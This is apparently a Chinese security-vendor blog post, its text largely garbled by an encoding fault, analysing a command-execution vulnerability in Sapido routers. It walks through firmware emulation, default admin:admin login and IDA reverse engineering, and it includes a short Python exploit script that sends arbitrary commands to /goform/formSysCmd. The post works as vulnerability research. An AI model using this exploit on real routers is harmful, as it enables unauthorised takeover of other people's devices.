Ìá½»ÐèÇó
*
*

*
*
*
Á¢¼´Ìá½»
µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

logo

    ²úÆ·Óë·þÎñ
    ½â¾ö·½°¸
    ¼¼ÊõÖ§³Ö
    ºÏ×÷·¢Õ¹
    ¹ØÓڻƽð³Ç

    ÉêÇëÊÔÓÃ
      Sapdio·ÓÉÆ÷ÃüÁîÖ´ÐзÖÎö
      ·¢²¼Ê±¼ä£º2023-03-10 ÔĶÁ´ÎÊý£º 1137 ´Î
      ͼƬ
      ǰÑÔ

      ½ðÖÇÑóSapidoÊÇ̨Íå¸ÖÌú¼¯ÍÅרΪ IoT ÎïÁªÍø¼¼ÊõËùͶ×ÊµÄÆ·ÅƿƼ¼¹«Ë¾£¬×¨ÃÅÉè¼Æ¿ª·¢ÖÇ»ÛÈ«ÎÞÏß±£È«ÏµÍ³¼°Ó²ÌåÉ豸£¬Í¬Ê±ÓµÓÐAPPµÄÑз¢ÄÜÁ¦£¬¿ç×ãÖǻۼÒÍ¥ SMART HOME TOTAL SOLUTION ¼° ÖÇÄÜÖÆÔì & ERPµÈÈ«·½Î»ÆóÒµÕûºÏ·½°¸£¬ÌṩÎÞÏß·ÖÏíÆ÷ÍøÍ¨²úÆ·¡¢Öǻ۲å×ù¡¢¼à¿Ø±£È«µÈ²úÆ·¡£½ðÖÇÑóSapidoƾ½åרҵµÄÑз¢ÍŶӼ°ÐÐÏúÊг¡µÄ¹æ»®£¬Éî¸ų̂Í壬¼á³Ǫ̈ÍåÖÆÔ죬²¢ÈÙ»ñ̨ÍåΨһӵÓÐMIT΢Ц±êÕµÄÍøÂ·Í¨Ñ¶ÆóÒµ£¬ÇÒÖÁ½ñÒÑÀÛ»ý50×ų̀Í徫Ʒ½±µÄÊâÈÙ£¬»ñ°ą̈Í徫ƷÖÕÉí³É¾Í½±¡£
      2019Äê¸ÃÆì϶à¸öÐͺÅ·ÓÉÆ÷´æÔÚδÊÚȨÃüÁîÖ´ÐЩ¶´£¬¿É±»ºÚ¿Í½øÐжñÒâÀûÓá£Ö÷ÒªÓ°ÏìµÄ°æ±¾ÎªBR270n-v2.1.03¡¢BRC76n-v2.1.03¡¢GR297-v2.1.3¡¢RB1732-v2.0.43¼°Ö®Ç°µÄ°æ±¾¡£
      ͼƬ
      ¹Ì¼þ»·¾³Ä£Äâ

      ÔÚÕâÀï¸Ã¹Ì¼þµÄ»·¾³Ä£ÄâÖ÷Ҫͨ¹ýfirmware-analysis-toolkit¹¤¾ßʵÏÖ£¬¸Ã¹¤¾ß¼¯³ÉÁËÖ÷Á÷µÄ¼¸¿î×Ô¶¯»¯¹Ì¼þÄ£Ä⹤¾ß¡£ÕâÀïÍÆ¼ö´ó¼ÒÏÂÔØattifyos3.0£¬ÆäÖÐÒѰ²×°firmware-analysis-toolkit¹¤¾ß

      attifyos3.0ÏÂÔØµØÖ·£ºhttps://pan.baidu.com/s/1-UQOBax1-t8EFVrzGvEhVQÌáÈ¡Â룺zshs

      ±¾´Î©¶´·ÖÎöËùʹÓõĹ̼þ°æ±¾Îª£ºRB-1732_TC_v2.0.43

      ¹Ì¼þÏÂÔØµØÖ·£ºhttps://share.weiyun.com/5Z9kOYc

      ½øÈëattifyosÐéÄâ»úÖУ¬Çл»Ä¿Â¼ÖÁ¡«/tools/firmware-analysis-toolkit

      ͼƬ

      ½«RB-1732_TC_v2.0.43.bin·ÅÖõ½ÐéÄâ»úÖУ¬ÔÚÕâÀïÎÒµÄλÖÃΪ/home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

      ͼƬ

      ÔÚÃüÁîÐÐÖÐÖ´ÐÐ python3 fat.py /home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

      ͼƬ

      ÕâÀïÊ×ÏÈ»á½øÐÐÍøÂçµÄ×Ô¶¯»¯ÅäÖ㬵±ÏÔʾbr0µÄÍøÂçµØÖ·Ê±£¬±íʾģÄâÆ÷ÍøÂçÒÑÅäÖú㬼Çס´ËʱµÄbr0µØÖ·Îª192.168.1.1

      ͼƬ

      ´Ëʱ»Ø³µ£¬½øÐй̼þµÄ²¿Êð£¬ÉÔµÈÆ¬¿Ì£¬ÏÔʾÈçÏÂͼÔò±íʾ»·¾³ÒѲ¿ÊðÍê³É

      ͼƬ

      ·ÃÎÊhttp://192.168.1.1/admin.asp£¬´ËʱÏÔʾ·ÓÉÆ÷µÄ¹ÜÀíÒ³Ãæ£¬Ä¬ÈÏÕ˺ÅÃÜÂëΪadmin:admin£¬±íʾ»·¾³ÒÑÄ£ÄâÍê³É

      ͼƬ
      ©¶´¸´ÏÖ

      ʹÓÃadmin:adminĬÈÏÕ˺ŵǼºǫ́£¬Ò³ÃæÏÔʾÈçÏÂ

      ͼƬ

      ½ÓÏÂÀ´·ÃÎÊhttp://192.168.1.1/syscmd.asp£¬½øÈëµ½ÃüÁîÖ´ÐÐÒ³

      ͼƬ

      ÊäÈëifconfigÃüÁ³É¹¦Ö´ÐÐ

      ͼƬ

      ͨ¹ý©¶´ÀûÓýű¾Ö´Ðнá¹ûÈçÏÂ

      ͼƬ

      rb1732_exploit.py½Å±¾ÄÚÈÝÈçÏÂ









      import requestsimport sysdef test_httpcommand(ip, command):  my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}  r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)  content = r.text  content = content[    content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:  content.rfind('</textarea>')]  return content print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
      ͼƬ
      ©¶´·ÖÎö

      ¸ù¾Ýsyscmd.aspÒ³Ãæ£¬ÊäÈëifconfigÃüÁץ°ü¿ÉÖª£¬ÕæÕýÖ´ÐÐÃüÁîµÄºǫ́³ÌÐòΪ/goform/formSysCmd£¬ÃüÁîµÄ²ÎÊýÃûΪsysCmd¡£

      ͼƬ

      ½ÓÏÂÀ´Ê¹ÓÃbinwalk½øÐй̼þÌáÈ¡£¬³¢ÊÔ½øÐÐÔ´Âë·ÖÎö£¬ÃüÁîΪbinwalk -Me RB-1732_TC_v2.0.43.bin

      ÌáÈ¡Íê³Éºó£¬»áÉú³É_RB-1732_TC_v2.0.43.bin.extractedĿ¼£¬ÆäÖб£´æÓй̼þµÄÔ´Âë


      ͼƬ

      ½øÈëµ½_RB-1732_TC_v2.0.43.bin.extracted/squashfs-rootÖУ¬grep -r "formSysCmd"£¬È«¾Ö²éÕÒ´æÔÚ¸Ã×Ö·ûµÄλÖÃ

      ͼƬ

      ¿ÉÒÔ¿´µ½£¬³ýÁËsyscmd.aspºÍobama.aspÒ³Ãæ³ÌÐò£¬Ö»ÓÐbin/websÎļþÆ¥Åäµ½£¬³õ²½ÅжÏwebs³ÌÐò²ÅÊÇÕæÕýµÄºǫ́´¦Àí³ÌÐò

      file bin/webs£¬²é¿´³ÌÐòÎļþ¸ñʽ£¬Îªmips 32λ³ÌÐò

      ͼƬ

      ½«websÎļþ¿½±´³öÀ´£¬µ¼Èëida½øÐо²Ì¬·ÖÎö£¬view -> open subviews -> Strings²é¿´È«²¿×Ö·û´®

      crtl +F ²éÕÒformSyscmd×Ö¶Î

      ͼƬ


      ¿ÉÒÔ¿´µ½ÓÐ2¸öλÖôæÔÚ¸Ã×ֶΣ¬·Ö±ðλÓÚ004044DBºÍ00471A44Á½¸öλÖã¬Ê×ÏÈË«»÷004044DBµÄλÖýøÈë

      ͼƬ


      ¼ÌÐøË«»÷formSysCmd£¬½øÈë¸Ãº¯ÊýµÄ¶¨Òå

      ͼƬ


      F5½øÐз´±àÒë²é¿´Î±´úÂë

      ͼƬ

      µ½ÕâÀïÎÒÃÇ¿ÉÒÔÇå³þµØ¿´µ½£¬formSysCmdº¯Êýͨ¹ýwebsGetVarº¯Êý»ñÈ¡Óû§µÄÊäÈ룬°üÀ¨ÓÐsubmit_url¡¢sysCmd¡¢writeData¡¢filename¡¢fpath¡¢readfileµÄ²ÎÊýÖµ¡£ÆäÖÐv3ΪsysCmdµÄ²ÎÊýÖµ

      ͼƬ


      ½ÓÏÂÀ´ÔÚûÓйýÂËv3ÖµµÄÇé¿öÏ£¬Í¨¹ýsnprintf¸ñʽ»¯Æ´½Ó×Ö·û´®£¬µÃµ½ v20= &v3  2>&1 > /tmp/syscmd.log
      ×îÖÕµ÷ÓÃsystemº¯ÊýÖ´ÐÐv20µÄ×Ö·û´®¡£
      ÕâÀォv3ÉèÖóÉifconfig£¬ÎÒÃÇÔÚ±¾µØÖ´Ðв鿴Ч¹û£¬¿ÉÒÔ¿´µ½ÃüÁî³É¹¦Ö´ÐУ¬²¢½«½á¹û·µ»Øµ½syscmd.log£¬Òò´ËÖ»ÒªÃüÁîÔÚsyscmd²ÎÊýλÖÃÊäÈëϵͳÃüÁÔò¿Éµ¼ÖÂÃüÁîÖ´ÐЩ¶´

      ͼƬ


      Ãâ·ÑÊÔÓÃ
      ·þÎñÈÈÏß

      ÂíÉÏ×Éѯ

      400-811-3777

      »Øµ½¶¥²¿
      ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿